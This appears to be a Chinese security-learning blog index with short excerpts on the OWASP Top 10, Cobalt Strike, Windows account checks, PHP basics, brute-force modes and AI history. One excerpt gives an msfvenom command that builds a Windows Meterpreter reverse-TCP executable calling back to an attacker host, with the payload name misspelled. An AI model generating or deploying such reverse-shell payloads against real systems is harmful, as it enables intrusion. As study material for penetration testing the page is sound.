0%

1. 常见的网站漏洞

OWASP TOP 10:每年公布关于web安全的十大安全威胁报告,三年公开一次

  • SQL注入(key):渗透数据库,获取数据库数据或者控制权限
  • XSS
  • 文件上传(key):上传木马病毒到网站中
  • 反序列化
  • 文件包含
  • CSRF
  • 命令执行(key):获取命令执行的权限
  • 信息泄露
  • XXE
  • SSRF
  • 未授权访问
Read more »

1. Cobalt Strike的安装和使用

Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。服务端是一个,客户端可以有多个,团队可进行分布式协团操作。,使用之前要自己先配置好java的环境。

Read more »

msfvenom -p(payload,负载选项) windows/x64/merterpreter/reverse_tcp lhost = 本机IP lport = 本机端口(随便)-f(生成什么形式的文件) exe -o(输出) demo.exe

1. 账户安全

1. 系统命令排查用户情况

  • query user:查看当前登录账户
  • logoff ID:注销用户ID
  • net user:查看用户
  • net user username:查看某个用户的登录情况
  • Iusrmgr.msc:打开本地的用户组

一般用于服务器端,本机客户端有些命令不存在

Read more »

1. 基础语法

1. 基本信息

  • PHP 文件的默认扩展名是 “.php”

  • PHP 文件中可以包含 htmlCSSJavaScript 代码

  • 单行注释 // 多行注释 /* */

Read more »

1. 爆破

1. 四种爆破模式

单字典(只有一个字典)
1.Sniper:按顺序一个一个参数依次遍历,一个参数遍历完,然后恢复成原数据,再遍历下一个参数。
2.Battering ram:每个参数同时遍历同一个字典。但是这种爆破在实际过程中是很不合理的,应为基本不会有人将用户名和密码设置成一样的,就像大多数人不会将qq密码设置成qq号一样。

一个相当于单挑,一个相当于群殴。

Read more »

1. 概述

1.1 发展

  • 人工智能起点:1956年,达特茅斯会议。

  • 机器学习:1980年代

  • 深度学习:2010年代

1.2 应用场景

预测,图像,NLP等

Read more »